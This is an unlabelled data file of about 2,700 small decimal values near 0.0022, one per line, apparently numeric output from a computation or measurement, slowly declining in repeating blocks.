0.00231319
0.00230856
0.00231317
0.00230861
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00228951
0.00229413
0.00229412
0.00228958
0.00229412
0.00228956
0.00228951
0.0022846
0.00228459
0.00228002
0.00227999
0.00228462
0.0022895
0.00229413
0.00228952
0.00229411
0.00228952
0.0022846
0.00228463
0.00228005
0.00228001
0.00228
0.00228462
0.00228461
0.00228951
0.00229412
0.00229413
0.00228958
0.00229412
0.00228951
0.00228956
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228952
0.00229411
0.00228953
0.0022846
0.00228463
0.00228001
0.00228005
0.00228461
0.00228462
0.00228
0.00230364
0.00230367
0.00229908
0.00229903
0.00230366
0.00230364
0.00229902
0.00230855
0.00231319
0.00230856
0.00230857
0.00231317
0.00230855
0.00230863
0.00231319
0.00231317
0.00230861
0.00231317
0.00230856
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00230364
0.00230367
0.00229903
0.00229908
0.00230364
0.00230366
0.00229902
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231317
0.00231319
0.00231317
0.00230856
0.00230861
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00228951
0.00229413
0.00229412
0.00228958
0.00229412
0.00228956
0.00228951
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228951
0.00229411
0.00228952
0.0022846
0.00228463
0.00228005
0.00228001
0.00228462
0.00228461
0.00228
0.00228951
0.00229412
0.00229413
0.00228958
0.00229412
0.00228951
0.00228956
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228951
0.00229411
0.00228952
0.0022846
0.00228463
0.00228001
0.00228005
0.00228461
0.00228462
0.00228
0.00230365
0.00229899
0.00229899
0.00230361
0.00230361
0.00229902
0.00230864
0.00231318
0.00231314
0.00230858
0.00230855
0.00231316
0.00230872
0.00230864
0.00231318
0.00231314
0.00230858
0.00230872
0.00231316
0.00230855
0.00230855
0.00231314
0.00231314
0.00230852
0.00231318
0.00230852
0.00230363
0.00229902
0.00230364
0.00229919
0.00230361
0.00230365
0.00229911
0.00230363
0.00229902
0.00230364
0.00229919
0.00230365
0.00230361
0.00229911
0.00230854
0.00230362
0.00228458
0.0022895
0.0022895
0.00229409
0.00229409
0.00229413
0.00228947
0.00228947
0.00228459
0.00228016
0.0022846
0.00228
0.00228461
0.00228457
0.00228008
0.00228459
0.00228016
0.00228461
0.00228
0.00228457
0.00228461
0.00228008
0.00228959
0.00229408
0.00229412
0.00228953
0.00228967
0.00229411
0.00228951
0.00228959
0.00229408
0.00229412
0.00228953
0.00229411
0.00228951
0.00228967
0.00228461
0.00227996
0.00227996
0.00228458
0.00228458
0.00227999
0.00228458
0.0022895
0.00230364
0.00230367
0.00229908
0.00229903
0.00230366
0.00230364
0.00229902
0.00230855
0.00231319
0.00230856
0.00230857
0.00231317
0.00230855
0.00230863
0.00231319
0.00231317
0.00230861
0.00231317
0.00230856
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00230364
0.00230367
0.00229908
0.00229903
0.00230366
0.00230364
0.00229902
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231319
0.00231317
0.00231317
0.00230861
0.00230856
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00228951
0.00229413
0.00229412
0.00228958
0.00229412
0.00228956
0.00228951
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228952
0.00229411
0.00228952
0.0022846
0.00228463
0.00228005
0.00228001
0.00228462
0.00228461
0.00228
0.00228951
0.00229413
0.00229412
0.00228958
0.00229412
0.00228956
0.00228951
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228951
0.00229411
0.00228952
0.0022846
0.00228463
0.00228005
0.00228001
0.00228462
0.00228461
0.00228
0.00230854
0.00230362
0.00230854
0.00230362
0.0022895
0.00229409
0.00229409
0.00229412
0.00228947
0.00228947
0.00228459
0.00228016
0.0022846
0.00228
0.00228008
0.00228461
0.00228457
0.00228459
0.00228016
0.0022846
0.00228
0.00228008
0.00228461
0.00228457
0.00228959
0.00229408
0.00229412
0.00228953
0.0022941
0.00228967
0.0022895
0.00228959
0.00229408
0.00229412
0.00228953
0.0022941
0.00228967
0.0022895
0.00228461
0.00227996
0.00227996
0.00227999
0.00228458
0.00228458
0.00228458
0.00228949
0.00228458
0.0022895
0.00227049
0.00226559
0.00227049
0.00226559
0.00226562
0.00226098
0.00226098
0.00226558
0.00226558
0.002261
0.00227058
0.00227511
0.00227507
0.00227052
0.00227509
0.0022705
0.00227066
0.00227058
0.00227511
0.00227507
0.00227052
0.00227509
0.0022705
0.00227066
0.00227049
0.00227508
0.00227508
0.00227511
0.00227047
0.00227047
0.0022656
0.00226101
0.00226561
0.00226117
0.00226558
0.00226109
0.00226561
0.0022656
0.00226101
0.00226561
0.00226117
0.00226558
0.00226109
0.00226561
0.00224663
0.00225152
0.00224663
0.00225152
0.00225153
0.0022561
0.0022561
0.00225614
0.0022515
0.0022515
0.00224664
0.00224222
0.00224665
0.00224206
0.00224662
0.00224665
0.00224214
0.00224664
0.00224222
0.00224665
0.00224206
0.00224662
0.00224665
0.00224214
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225153
0.00225169
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225153
0.00225169
0.00224666
0.00224203
0.00224203
0.00224663
0.00224663
0.00224206
0.00226561
0.00226563
0.00226102
0.00226107
0.00226561
0.00226562
0.00226101
0.00227049
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.0022751
0.00227512
0.00227051
0.0022751
0.00227055
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00225153
0.00225613
0.00225614
0.0022516
0.00225613
0.00225154
0.00225159
0.00224665
0.00224664
0.00224208
0.00224206
0.00224667
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224207
0.00224212
0.00224206
0.00224666
0.00224667
0.00225153
0.00225613
0.00225614
0.0022516
0.00225613
0.00225154
0.00225159
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224207
0.00224212
0.00224666
0.00224667
0.00224206
0.00226562
0.00226098
0.00226098
0.00226558
0.00226558
0.002261
0.00227058
0.0022751
0.00227507
0.00227052
0.0022705
0.00227509
0.00227066
0.00227058
0.0022751
0.00227507
0.00227052
0.00227066
0.00227509
0.0022705
0.00227049
0.00227508
0.00227508
0.00227047
0.00227511
0.00227047
0.0022656
0.00226101
0.00226561
0.00226117
0.00226558
0.00226561
0.00226109
0.0022656
0.00226101
0.00226561
0.00226117
0.00226561
0.00226558
0.00226109
0.00227049
0.00226559
0.00224663
0.00225152
0.00225153
0.0022561
0.0022561
0.00225613
0.0022515
0.0022515
0.00224664
0.00224222
0.00224665
0.00224206
0.00224665
0.00224662
0.00224214
0.00224664
0.00224222
0.00224665
0.00224206
0.00224662
0.00224665
0.00224214
0.00225161
0.0022561
0.00225613
0.00225156
0.00225169
0.00225611
0.00225153
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225153
0.00225169
0.00224666
0.00224203
0.00224203
0.00224663
0.00224663
0.00224206
0.00224663
0.00225152
0.00226561
0.00226563
0.00226102
0.00226107
0.00226561
0.00226562
0.00226101
0.00227049
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.0022751
0.00227512
0.00227051
0.0022751
0.00227056
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00225153
0.00225614
0.00225613
0.0022516
0.00225613
0.00225159
0.00225154
0.00224665
0.00224664
0.00224208
0.00224206
0.00224667
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224212
0.00224207
0.00224206
0.00224667
0.00224666
0.00225153
0.00225613
0.00225614
0.0022516
0.00225613
0.00225154
0.00225159
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224207
0.00224212
0.00224666
0.00224667
0.00224207
0.00226561
0.00226563
0.00226106
0.00226102
0.00226562
0.00226561
0.00226101
0.00227049
0.00227512
0.00227051
0.00227052
0.0022751
0.0022705
0.00227057
0.00227512
0.0022751
0.00227055
0.0022751
0.00227051
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00226561
0.00226563
0.00226102
0.00226107
0.00226561
0.00226562
0.00226101
0.00227049
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.0022751
0.00227512
0.0022751
0.00227051
0.00227055
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00225153
0.00225614
0.00225613
0.0022516
0.00225613
0.00225159
0.00225154
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224212
0.00224207
0.00224667
0.00224666
0.00224207
0.00225153
0.00225613
0.00225614
0.0022516
0.00225613
0.00225154
0.00225159
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224207
0.00224212
0.00224666
0.00224667
0.00224206
0.00226562
0.00226098
0.00226098
0.00226558
0.00226558
0.002261
0.00227058
0.00227511
0.00227507
0.00227052
0.0022705
0.00227509
0.00227066
0.00227058
0.00227511
0.00227507
0.00227052
0.00227066
0.00227509
0.0022705
0.00227049
0.00227508
0.00227508
0.00227047
0.00227511
0.00227047
0.0022656
0.00226101
0.00226561
0.00226117
0.00226558
0.00226561
0.00226109
0.0022656
0.00226101
0.00226561
0.00226117
0.00226561
0.00226558
0.00226109
0.00227049
0.00226559
0.00224663
0.00225152
0.00225153
0.0022561
0.0022561
0.00225613
0.0022515
0.0022515
0.00224664
0.00224222
0.00224665
0.00224206
0.00224665
0.00224662
0.00224214
0.00224664
0.00224222
0.00224665
0.00224206
0.00224662
0.00224665
0.00224214
0.00225161
0.0022561
0.00225613
0.00225156
0.00225169
0.00225611
0.00225153
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225153
0.00225169
0.00224666
0.00224203
0.00224203
0.00224663
0.00224663
0.00224206
0.00224663
0.00225152
0.00226561
0.00226563
0.00226106
0.00226102
0.00226562
0.00226561
0.00226101
0.00227049
0.00227512
0.00227051
0.00227052
0.0022751
0.0022705
0.00227057
0.00227512
0.0022751
0.00227055
0.0022751
0.00227051
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00226561
0.00226563
0.00226106
0.00226102
0.00226562
0.00226561
0.00226101
0.00227049
0.00227512
0.00227051
0.0022751
0.00227052
0.0022705
0.00227057
0.00227512
0.0022751
0.0022751
0.00227055
0.00227051
0.0022656
0.00226103
0.0022656
0.00226563
0.00226101
0.00225153
0.00225614
0.00225613
0.0022516
0.00225613
0.00225159
0.00225154
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224212
0.00224207
0.00224667
0.00224666
0.00224206
0.00225153
0.00225614
0.00225613
0.0022516
0.00225613
0.00225159
0.00225154
0.00224665
0.00224664
0.00224208
0.00224667
0.00224206
0.00225153
0.00225614
0.00225154
0.00225612
0.00225155
0.00224665
0.00224668
0.00224212
0.00224207
0.00224667
0.00224666
0.00224206
0.00227049
0.00226559
0.00227049
0.00226559
0.00225152
0.0022561
0.0022561
0.00225613
0.0022515
0.0022515
0.00224664
0.00224222
0.00224665
0.00224206
0.00224214
0.00224665
0.00224662
0.00224664
0.00224222
0.00224665
0.00224206
0.00224214
0.00224665
0.00224662
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225169
0.00225153
0.00225161
0.0022561
0.00225613
0.00225156
0.00225611
0.00225169
0.00225153
0.00224666
0.00224203
0.00224203
0.00224206
0.00224663
0.00224663
0.00224663
0.00225152
0.00224663
0.00225152
0.00223259
0.00222771
0.00223259
0.00222772
0.00222774
0.00222312
0.00222312
0.00222771
0.00222771
0.00222314
0.00223268
0.00223719
0.00223716
0.00223263
0.00223718
0.0022326
0.00223276
0.00223268
0.00223719
0.00223716
0.00223263
0.00223718
0.0022326
0.00223276
0.0022326
0.00223717
0.00223717
0.0022372
0.00223257
0.00223257
0.00222772
0.00222315
0.00222773
0.00222331
0.00222771
0.00222323
0.00222773
0.00222772
0.00222315
0.00222773
0.00222331
0.00222771
0.00222323
0.00222773
0.00220883
0.0022137
0.00220883
0.0022137
0.0022137
0.00221826
0.00221826
0.0022183
0.00221368
0.00221368
0.00220883
0.00220443
0.00220885
0.00220427
0.00220882
0.00220885
0.00220435
0.00220884
0.00220443
0.00220885
0.00220428
0.00220882
0.00220885
0.00220435
0.00221378
0.00221826
0.00221828
0.00221373
0.00221827
0.00221371
0.00221386
0.00221378
0.00221826
0.00221828
0.00221373
0.00221827
0.00221371
0.00221386
0.00220886
0.00220424
0.00220424
0.00220883
0.00220883
0.00220427
0.00222773
0.00222776
0.00222316
0.0022232
0.00222774
0.00222775
0.00222315
0.0022326
0.00223721
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.00223719
0.0022372
0.00223261
0.00223719
0.00223265
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00221371
0.00221829
0.0022183
0.00221378
0.00221829
0.00221372
0.00221376
0.00220885
0.00220884
0.00220429
0.00220427
0.00220886
0.0022137
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220428
0.00220433
0.00220428
0.00220885
0.00220886
0.00221371
0.00221829
0.0022183
0.00221378
0.00221829
0.00221372
0.00221376
0.00220885
0.00220884
0.00220429
0.00220887
0.00220427
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220428
0.00220433
0.00220885
0.00220886
0.00220428
0.00222774
0.00222312
0.00222312
0.00222771
0.00222771
0.00222314
0.00223268
0.00223719
0.00223716
0.00223263
0.0022326
0.00223718
0.00223276
0.00223268
0.00223719
0.00223716
0.00223263
0.00223276
0.00223718
0.0022326
0.0022326
0.00223717
0.00223717
0.00223257
0.0022372
0.00223257
0.00222772
0.00222315
0.00222773
0.00222331
0.00222771
0.00222773
0.00222323
0.00222772
0.00222315
0.00222773
0.00222331
0.00222773
0.00222771
0.00222323
0.00223259
0.00222772
0.00220883
0.0022137
0.0022137
0.00221826
0.00221826
0.0022183
0.00221368
0.00221368
0.00220884
0.00220443
0.00220885
0.00220428
0.00220885
0.00220882
0.00220435
0.00220884
0.00220443
0.00220885
0.00220427
0.00220882
0.00220885
0.00220435
0.00221378
0.00221826
0.00221828
0.00221373
0.00221386
0.00221827
0.00221371
0.00221378
0.00221826
0.00221828
0.00221373
0.00221827
0.00221371
0.00221386
0.00220886
0.00220424
0.00220424
0.00220883
0.00220883
0.00220427
0.00220883
0.0022137
0.00222773
0.00222776
0.00222316
0.0022232
0.00222774
0.00222775
0.00222315
0.0022326
0.0022372
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.00223719
0.0022372
0.00223261
0.00223719
0.00223266
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00221371
0.0022183
0.00221829
0.00221378
0.00221829
0.00221376
0.00221372
0.00220885
0.00220884
0.00220429
0.00220427
0.00220887
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220432
0.00220428
0.00220428
0.00220886
0.00220885
0.00221371
0.00221829
0.0022183
0.00221378
0.00221829
0.00221372
0.00221376
0.00220885
0.00220884
0.00220429
0.00220886
0.00220427
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220428
0.00220433
0.00220885
0.00220886
0.00220428
0.00222773
0.00222776
0.0022232
0.00222316
0.00222775
0.00222774
0.00222315
0.0022326
0.00223721
0.00223261
0.00223262
0.00223718
0.0022326
0.00223267
0.0022372
0.00223719
0.00223266
0.00223719
0.00223261
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00222773
0.00222776
0.00222316
0.0022232
0.00222774
0.00222775
0.00222315
0.0022326
0.0022372
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.00223719
0.0022372
0.00223719
0.00223261
0.00223266
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00221371
0.0022183
0.00221829
0.00221378
0.00221829
0.00221376
0.00221372
0.00220885
0.00220884
0.00220429
0.00220887
0.00220427
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220432
0.00220428
0.00220886
0.00220885
0.00220428
0.00221371
0.00221829
0.0022183
0.00221378
0.00221829
0.00221372
0.00221376
0.00220885
0.00220884
0.00220429
0.00220887
0.00220427
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220428
0.00220432
0.00220885
0.00220886
0.00220428
0.00222774
0.00222312
0.00222312
0.00222771
0.00222771
0.00222314
0.00223268
0.00223719
0.00223716
0.00223263
0.0022326
0.00223718
0.00223276
0.00223268
0.00223719
0.00223716
0.00223263
0.00223276
0.00223718
0.0022326
0.0022326
0.00223717
0.00223717
0.00223257
0.0022372
0.00223257
0.00222772
0.00222315
0.00222773
0.00222331
0.00222771
0.00222773
0.00222323
0.00222772
0.00222315
0.00222773
0.00222331
0.00222773
0.00222771
0.00222323
0.00223259
0.00222772
0.00220883
0.0022137
0.0022137
0.00221826
0.00221826
0.0022183
0.00221368
0.00221368
0.00220884
0.00220443
0.00220885
0.00220428
0.00220885
0.00220882
0.00220435
0.00220884
0.00220443
0.00220885
0.00220428
0.00220882
0.00220885
0.00220435
0.00221378
0.00221826
0.00221828
0.00221373
0.00221386
0.00221827
0.00221371
0.00221378
0.00221826
0.00221828
0.00221373
0.00221827
0.00221371
0.00221386
0.00220886
0.00220424
0.00220424
0.00220883
0.00220883
0.00220427
0.00220883
0.0022137
0.00222773
0.00222776
0.0022232
0.00222316
0.00222775
0.00222774
0.00222315
0.0022326
0.00223721
0.00223261
0.00223262
0.00223719
0.0022326
0.00223267
0.0022372
0.00223719
0.00223266
0.00223719
0.00223261
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00222773
0.00222776
0.0022232
0.00222316
0.00222775
0.00222774
0.00222315
0.0022326
0.0022372
0.00223261
0.00223718
0.00223262
0.0022326
0.00223267
0.0022372
0.00223719
0.00223719
0.00223266
0.00223261
0.00222773
0.00222317
0.00222772
0.00222775
0.00222315
0.00221371
0.0022183
0.00221829
0.00221378
0.00221829
0.00221376
0.00221372
0.00220885
0.00220884
0.00220429
0.00220887
0.00220427
0.00221371
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220433
0.00220428
0.00220886
0.00220885
0.00220428
0.00221371
0.0022183
0.00221829
0.00221378
0.00221829
0.00221376
0.00221372
0.00220885
0.00220884
0.00220429
0.00220887
0.00220427
0.0022137
0.0022183
0.00221372
0.00221828
0.00221373
0.00220885
0.00220887
0.00220432
0.00220428
0.00220886
0.00220885
0.00220428
0.00223259
0.00222771
0.00223259
0.00222772
0.0022137
0.00221826
0.00221826
0.0022183
0.00221368
0.00221368
0.00220884
0.00220443
0.00220885
0.00220428
0.00220435
0.00220885
0.00220882
0.00220884
0.00220443
0.00220885
0.00220428
0.00220435
0.00220885
0.00220882
0.00221378
0.00221826
0.00221828
0.00221373
0.00221827
0.00221386
0.00221371
0.00221378
0.00221826
0.00221829
0.00221373
0.00221827
0.00221386
0.00221371
0.00220886
0.00220424
0.00220424
0.00220427
0.00220883
0.00220883
0.00220883
0.0022137
0.00220883
0.0022137
0.00219484
0.00218998
0.00219484
0.00218998
0.00219
0.0021854
0.0021854
0.00218998
0.00218998
0.00218542
0.00219492
0.00219941
0.00219939
0.00219487
0.0021994
0.00219485
0.002195
0.00219492
0.00219941
0.00219939
0.00219487
0.0021994
0.00219485
0.002195
0.00219484
0.0021994
0.0021994
0.00219943
0.00219482
0.00219482
0.00218998
0.00218543
0.00219
0.00218558
0.00218997
0.0021855
0.00218999
0.00218998
0.00218543
0.00219
0.00218558
0.00218997
0.0021855
0.00218999
0.00217116
0.00217601
0.00217116
0.00217601
0.00217601
0.00218056
0.00218056
0.00218059
0.00217599
0.00217599
0.00217116
0.00216676
0.00217117
0.00216661
0.00217115
0.00217117
0.00216668
0.00217116
0.00216676
0.00217118
0.00216661
0.00217115
0.00217117
0.00216668
0.00217609
0.00218055
0.00218058
0.00217604
0.00218057
0.00217602
0.00217617
0.00217609
0.00218055
0.00218058
0.00217604
0.00218057
0.00217602
0.00217617
0.00217118
0.00216658
0.00216658
0.00217115
0.00217115
0.0021666
0.00219
0.00219002
0.00218544
0.00218548
0.00219
0.00219001
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219942
0.00219943
0.00219486
0.00219942
0.0021949
0.00218999
0.00218544
0.00218998
0.00219001
0.00218542
0.00217602
0.00218058
0.00218059
0.00217608
0.00218058
0.00217602
0.00217607
0.00217117
0.00217116
0.00216663
0.00216661
0.00217119
0.00217601
0.0021806
0.00217602
0.00218058
0.00217603
0.00217117
0.00217119
0.00216662
0.00216666
0.00216661
0.00217118
0.00217118
0.00217602
0.00218058
0.00218059
0.00217608
0.00218058
0.00217602
0.00217606
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217602
0.00218058
0.00217603
0.00217117
0.00217119
0.00216662
0.00216666
0.00217118
0.00217119
0.00216661
0.00219001
0.0021854
0.0021854
0.00218998
0.00218998
0.00218542
0.00219492
0.00219941
0.00219939
0.00219487
0.00219485
0.0021994
0.002195
0.00219492
0.00219941
0.00219939
0.00219487
0.002195
0.0021994
0.00219485
0.00219484
0.0021994
0.0021994
0.00219482
0.00219943
0.00219482
0.00218998
0.00218543
0.00219
0.00218558
0.00218997
0.00218999
0.0021855
0.00218998
0.00218543
0.00219
0.00218558
0.00218999
0.00218997
0.0021855
0.00219484
0.00218998
0.00217116
0.00217601
0.00217601
0.00218056
0.00218056
0.00218059
0.00217599
0.00217599
0.00217116
0.00216676
0.00217117
0.00216661
0.00217117
0.00217115
0.00216668
0.00217116
0.00216676
0.00217117
0.00216661
0.00217115
0.00217117
0.00216668
0.00217609
0.00218055
0.00218057
0.00217604
0.00217617
0.00218057
0.00217602
0.00217609
0.00218056
0.00218057
0.00217604
0.00218057
0.00217602
0.00217617
0.00217118
0.00216658
0.00216658
0.00217115
0.00217115
0.0021666
0.00217116
0.00217601
0.00219
0.00219002
0.00218544
0.00218548
0.00219
0.00219001
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219942
0.00219943
0.00219486
0.00219942
0.0021949
0.00218999
0.00218545
0.00218998
0.00219001
0.00218543
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217607
0.00217603
0.00217117
0.00217116
0.00216663
0.00216661
0.00217119
0.00217601
0.0021806
0.00217603
0.00218058
0.00217603
0.00217118
0.00217119
0.00216666
0.00216662
0.00216661
0.00217119
0.00217118
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217603
0.00217607
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217603
0.00218058
0.00217603
0.00217118
0.00217119
0.00216662
0.00216666
0.00217118
0.00217119
0.00216661
0.00219
0.00219002
0.00218548
0.00218544
0.00219001
0.00219
0.00218543
0.00219484
0.00219943
0.00219486
0.00219486
0.00219942
0.00219485
0.00219491
0.00219943
0.00219942
0.0021949
0.00219942
0.00219486
0.00218999
0.00218544
0.00218998
0.00219001
0.00218543
0.00219
0.00219002
0.00218544
0.00218548
0.00219
0.00219001
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219942
0.00219943
0.00219942
0.00219486
0.0021949
0.00218999
0.00218544
0.00218998
0.00219001
0.00218542
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217607
0.00217603
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217603
0.00218058
0.00217603
0.00217118
0.00217119
0.00216666
0.00216662
0.00217119
0.00217118
0.00216661
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217603
0.00217607
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217602
0.00218058
0.00217603
0.00217118
0.00217119
0.00216662
0.00216666
0.00217118
0.00217119
0.00216661
0.00219001
0.0021854
0.0021854
0.00218998
0.00218998
0.00218542
0.00219492
0.00219941
0.00219939
0.00219487
0.00219485
0.0021994
0.002195
0.00219492
0.00219941
0.00219939
0.00219487
0.002195
0.0021994
0.00219485
0.00219484
0.0021994
0.0021994
0.00219482
0.00219943
0.00219482
0.00218998
0.00218543
0.00219
0.00218558
0.00218997
0.00218999
0.0021855
0.00218998
0.00218543
0.00219
0.00218558
0.00218999
0.00218997
0.0021855
0.00219484
0.00218998
0.00217116
0.00217601
0.00217601
0.00218056
0.00218056
0.00218059
0.00217599
0.00217599
0.00217116
0.00216676
0.00217118
0.00216661
0.00217117
0.00217115
0.00216668
0.00217116
0.00216676
0.00217118
0.00216661
0.00217115
0.00217117
0.00216668
0.00217609
0.00218056
0.00218058
0.00217604
0.00217617
0.00218057
0.00217602
0.00217609
0.00218056
0.00218057
0.00217604
0.00218057
0.00217602
0.00217617
0.00217118
0.00216658
0.00216658
0.00217115
0.00217115
0.0021666
0.00217116
0.00217601
0.00219
0.00219002
0.00218548
0.00218544
0.00219001
0.00219
0.00218543
0.00219484
0.00219944
0.00219486
0.00219486
0.00219942
0.00219485
0.00219491
0.00219943
0.00219942
0.0021949
0.00219942
0.00219486
0.00218999
0.00218544
0.00218998
0.00219001
0.00218542
0.00219
0.00219002
0.00218548
0.00218544
0.00219001
0.00219
0.00218543
0.00219484
0.00219943
0.00219486
0.00219942
0.00219486
0.00219485
0.00219491
0.00219943
0.00219942
0.00219942
0.0021949
0.00219486
0.00218999
0.00218544
0.00218998
0.00219001
0.00218542
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217607
0.00217602
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217602
0.00218058
0.00217603
0.00217117
0.00217119
0.00216666
0.00216662
0.00217119
0.00217118
0.00216661
0.00217602
0.00218059
0.00218059
0.00217608
0.00218058
0.00217607
0.00217602
0.00217117
0.00217116
0.00216663
0.00217119
0.00216661
0.00217601
0.0021806
0.00217602
0.00218058
0.00217603
0.00217118
0.00217119
0.00216666
0.00216662
0.00217119
0.00217118
0.00216661
0.00219484
0.00218998
0.00219484
0.00218998
0.00217601
0.00218056
0.00218056
0.00218059
0.00217599
0.00217599
0.00217116
0.00216676
0.00217118
0.00216661
0.00216668
0.00217117
0.00217115
0.00217116
0.00216676
0.00217118
0.00216661
0.00216668
0.00217117
0.00217115
0.00217609
0.00218056
0.00218058
0.00217604
0.00218057
0.00217617
0.00217602
0.00217609
0.00218056
0.00218058
0.00217604
0.00218057
0.00217617
0.00217602
0.00217118
0.00216658
0.00216658
0.0021666
0.00217115
0.00217115
0.00217116
0.00217601
0.00217116
0.00217601
0.0021572
0.00215236
0.0021572
0.00215236
0.00215239
0.00214779
0.00214779
0.00215236
0.00215236
0.00214781
0.00215728
0.00216176
0.00216175
0.00215723
0.00216176
0.00215721
0.00215736
0.00215728
0.00216176
0.00216175
0.00215723
0.00216176
0.00215721
0.00215736
0.0021572
0.00216175
0.00216175
0.00216178
0.00215718
0.00215718
0.00215236
0.00214782
0.00215238
0.00214797
0.00215235
0.00214789
0.00215237
0.00215236
0.00214782
0.00215238
0.00214797
0.00215235
0.00214789
0.00215237
0.00213359
0.00213842
0.00213359
0.00213843
0.00213843
0.00214297
0.00214297
0.002143
0.0021384
0.0021384
0.00213359
0.0021292
0.00213361
0.00212905
0.00213358
0.00213359
0.00212912
0.00213359
0.0021292
0.00213361
0.00212905
0.00213358
0.0021336
0.00212912
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213843
0.00213858
0.0021385
0.00214296
0.00214298
0.00213846
0.00214297
0.00213843
0.00213858
0.00213361
0.00212902
0.00212902
0.00213359
0.00213359
0.00212905
0.00215238
0.0021524
0.00214783
0.00214787
0.00215238
0.00215239
0.00214782
0.00215721
0.00216179
0.00215722
0.00216177
0.00215723
0.00215721
0.00215728
0.00216178
0.00216178
0.00215722
0.00216177
0.00215726
0.00215237
0.00214784
0.00215236
0.00215239
0.00214782
0.00213844
0.00214299
0.002143
0.0021385
0.00214299
0.00213844
0.00213848
0.0021336
0.00213359
0.00212907
0.00212905
0.00213362
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.00212906
0.0021291
0.00212905
0.00213361
0.00213362
0.00213844
0.00214299
0.002143
0.0021385
0.00214299
0.00213844
0.00213848
0.0021336
0.00213359
0.00212907
0.00213362
0.00212905
0.00213843
0.002143
0.00213844
0.00214299
0.00213845
0.00213361
0.00213362
0.00212906
0.0021291
0.00213361
0.00213362
0.00212905
0.00215239
0.00214779
0.00214779
0.00215236
0.00215236
0.00214781
0.00215728
0.00216176
0.00216175
0.00215723
0.00215721
0.00216176
0.00215736
0.00215728
0.00216176
0.00216175
0.00215724
0.00215736
0.00216176
0.00215721
0.0021572
0.00216175
0.00216175
0.00215718
0.00216178
0.00215718
0.00215236
0.00214782
0.00215238
0.00214797
0.00215235
0.00215237
